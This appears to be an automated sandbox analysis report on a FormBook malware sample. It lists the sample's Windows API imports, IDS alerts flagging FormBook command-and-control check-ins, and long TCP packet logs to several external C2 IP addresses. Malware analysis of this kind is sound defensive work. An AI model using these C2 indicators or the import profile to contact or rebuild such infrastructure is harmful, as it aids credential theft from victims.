                                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                          GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                          OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishGreat Britain
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-09-30T18:44:31.185960+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549711137.175.33.5680TCP
                                                                                          2024-09-30T18:44:31.185960+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549711137.175.33.5680TCP
                                                                                          2024-09-30T18:44:46.814759+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497133.33.130.19080TCP
                                                                                          2024-09-30T18:44:50.271880+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497143.33.130.19080TCP
                                                                                          2024-09-30T18:44:51.911631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497153.33.130.19080TCP
                                                                                          2024-09-30T18:44:54.473989+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497163.33.130.19080TCP
                                                                                          2024-09-30T18:44:54.473989+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497163.33.130.19080TCP
                                                                                          2024-09-30T18:45:00.003802+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497173.33.130.19080TCP
                                                                                          2024-09-30T18:45:02.521743+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497183.33.130.19080TCP
                                                                                          2024-09-30T18:45:05.075570+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497193.33.130.19080TCP
                                                                                          2024-09-30T18:45:08.252588+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497203.33.130.19080TCP
                                                                                          2024-09-30T18:45:08.252588+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497203.33.130.19080TCP
                                                                                          2024-09-30T18:45:15.518326+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549721188.114.96.380TCP
                                                                                          2024-09-30T18:45:18.127639+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549722188.114.96.380TCP
                                                                                          2024-09-30T18:45:20.674358+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549723188.114.96.380TCP
                                                                                          2024-09-30T18:45:24.969888+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549724188.114.96.380TCP
                                                                                          2024-09-30T18:45:24.969888+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549724188.114.96.380TCP
                                                                                          2024-09-30T18:45:30.783978+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972531.31.196.1780TCP
                                                                                          2024-09-30T18:45:33.928191+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972631.31.196.1780TCP
                                                                                          2024-09-30T18:45:36.499997+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972731.31.196.1780TCP
                                                                                          2024-09-30T18:45:39.051168+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54972831.31.196.1780TCP
                                                                                          2024-09-30T18:45:39.051168+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54972831.31.196.1780TCP
                                                                                          2024-09-30T18:45:44.803733+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497293.33.130.19080TCP
                                                                                          2024-09-30T18:45:47.605022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497303.33.130.19080TCP
                                                                                          2024-09-30T18:45:49.890046+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497313.33.130.19080TCP
                                                                                          2024-09-30T18:45:52.448504+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497323.33.130.19080TCP
                                                                                          2024-09-30T18:45:52.448504+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497323.33.130.19080TCP
                                                                                          2024-09-30T18:45:57.946440+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497333.33.130.19080TCP
                                                                                          2024-09-30T18:46:00.491065+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497343.33.130.19080TCP
                                                                                          2024-09-30T18:46:03.052545+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497353.33.130.19080TCP
                                                                                          2024-09-30T18:46:06.630905+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497363.33.130.19080TCP
                                                                                          2024-09-30T18:46:06.630905+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497363.33.130.19080TCP
                                                                                          2024-09-30T18:46:12.840052+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549737199.192.21.16980TCP
                                                                                          2024-09-30T18:46:15.509966+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549738199.192.21.16980TCP
                                                                                          2024-09-30T18:46:18.150197+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549739199.192.21.16980TCP
                                                                                          2024-09-30T18:46:20.598814+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549740199.192.21.16980TCP
                                                                                          2024-09-30T18:46:20.598814+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549740199.192.21.16980TCP
                                                                                          2024-09-30T18:46:26.314021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497413.33.130.19080TCP
                                                                                          2024-09-30T18:46:29.738124+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497423.33.130.19080TCP
                                                                                          2024-09-30T18:46:31.922116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497433.33.130.19080TCP
                                                                                          2024-09-30T18:46:34.481837+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497443.33.130.19080TCP
                                                                                          2024-09-30T18:46:34.481837+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497443.33.130.19080TCP
                                                                                          2024-09-30T18:46:40.040590+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549745188.114.96.380TCP
                                                                                          2024-09-30T18:46:42.546070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549746188.114.96.380TCP
                                                                                          2024-09-30T18:46:45.069786+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549747188.114.96.380TCP
                                                                                          2024-09-30T18:46:47.677651+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549748188.114.96.380TCP
                                                                                          2024-09-30T18:46:47.677651+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549748188.114.96.380TCP
                                                                                          2024-09-30T18:46:53.641925+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974984.32.84.3280TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Sep 30, 2024 18:44:30.576163054 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:30.581080914 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:30.581224918 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:30.590893984 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:30.595733881 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185806990 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185832024 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185849905 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185867071 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185879946 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185894012 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185909033 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.185960054 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.185997963 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.186395884 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.186435938 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.186439037 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.186454058 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.186481953 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.190866947 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.190907955 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.190923929 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.190965891 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.191095114 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.191109896 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.191138029 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.236773014 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.278289080 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278311968 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278327942 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278343916 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278359890 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278426886 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:31.278495073 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.278526068 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.284682989 CEST4971180192.168.2.5137.175.33.56
                                                                                          Sep 30, 2024 18:44:31.289812088 CEST8049711137.175.33.56192.168.2.5
                                                                                          Sep 30, 2024 18:44:46.350212097 CEST4971380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:46.355654001 CEST80497133.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:46.355742931 CEST4971380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:46.365623951 CEST4971380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:46.370975018 CEST80497133.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:46.814681053 CEST80497133.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:46.814759016 CEST4971380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:47.888940096 CEST4971380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:47.893908024 CEST80497133.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:48.896158934 CEST4971480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:48.901794910 CEST80497143.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:48.901941061 CEST4971480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:48.912132978 CEST4971480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:48.917016029 CEST80497143.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:50.271815062 CEST80497143.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:50.271879911 CEST4971480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:50.424417019 CEST4971480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:50.429369926 CEST80497143.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:51.442994118 CEST4971580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:51.448775053 CEST80497153.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:51.448887110 CEST4971580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:51.458947897 CEST4971580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:51.464370012 CEST80497153.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:51.464402914 CEST80497153.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:51.911524057 CEST80497153.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:51.911631107 CEST4971580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:52.971204042 CEST4971580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:52.976264000 CEST80497153.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:53.997061014 CEST4971680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:54.002799988 CEST80497163.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:54.002959967 CEST4971680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:54.016280890 CEST4971680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:54.021137953 CEST80497163.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:54.473778963 CEST80497163.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:54.473804951 CEST80497163.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:54.473989010 CEST4971680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:54.476650953 CEST4971680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:54.481699944 CEST80497163.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:59.507158041 CEST4971780192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:59.512171030 CEST80497173.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:44:59.512373924 CEST4971780192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:59.522563934 CEST4971780192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:44:59.527899027 CEST80497173.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:00.003643036 CEST80497173.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:00.003802061 CEST4971780192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:01.035120010 CEST4971780192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:01.040601015 CEST80497173.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:02.052423000 CEST4971880192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:02.057566881 CEST80497183.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:02.057697058 CEST4971880192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:02.067527056 CEST4971880192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:02.073376894 CEST80497183.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:02.521620989 CEST80497183.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:02.521743059 CEST4971880192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:03.580714941 CEST4971880192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:03.585700035 CEST80497183.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:04.599447966 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:04.604399920 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:04.604608059 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:04.614773035 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:04.619899035 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:04.620230913 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:05.075373888 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:05.075570107 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:06.127574921 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:06.440053940 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:06.521437883 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:06.521519899 CEST80497193.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:06.521786928 CEST4971980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:07.146475077 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:07.151591063 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:07.151674986 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:07.160469055 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:07.165376902 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:08.252270937 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:08.252335072 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:08.252365112 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:08.252393961 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:08.252588034 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:08.252914906 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:08.255300045 CEST4972080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:08.261164904 CEST80497203.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:13.996642113 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:14.001564980 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:14.001678944 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:14.011528969 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:14.016360998 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:15.518326044 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:15.830527067 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.318583965 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.318694115 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.318701982 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.318736076 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.318762064 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.318841934 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.320951939 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.321000099 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.321449995 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.321460009 CEST8049721188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.321485043 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.321511984 CEST4972180192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.536730051 CEST4972280192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.611673117 CEST8049722188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:16.611810923 CEST4972280192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.621462107 CEST4972280192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:16.628252983 CEST8049722188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:18.127639055 CEST4972280192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:18.133095026 CEST8049722188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:18.133307934 CEST4972280192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:19.146687031 CEST4972380192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:19.151570082 CEST8049723188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:19.151652098 CEST4972380192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:19.166954994 CEST4972380192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:19.171977043 CEST8049723188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:19.172182083 CEST8049723188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:20.674357891 CEST4972380192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:20.682081938 CEST8049723188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:20.682195902 CEST4972380192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:21.693331003 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:22.705687046 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:22.802102089 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:22.802141905 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:22.802426100 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:22.802426100 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:22.809087038 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:22.815457106 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969702959 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969793081 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969829082 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969862938 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969887972 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.969916105 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.970022917 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.972429991 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.972793102 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.972819090 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.977955103 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.092318058 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.097259045 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.097354889 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.107839108 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.113665104 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783900976 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783925056 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783977985 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:31.613924980 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:32.631947041 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:33.239751101 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.239862919 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:33.269056082 CEST4972680192.168.2.531.31.196.17
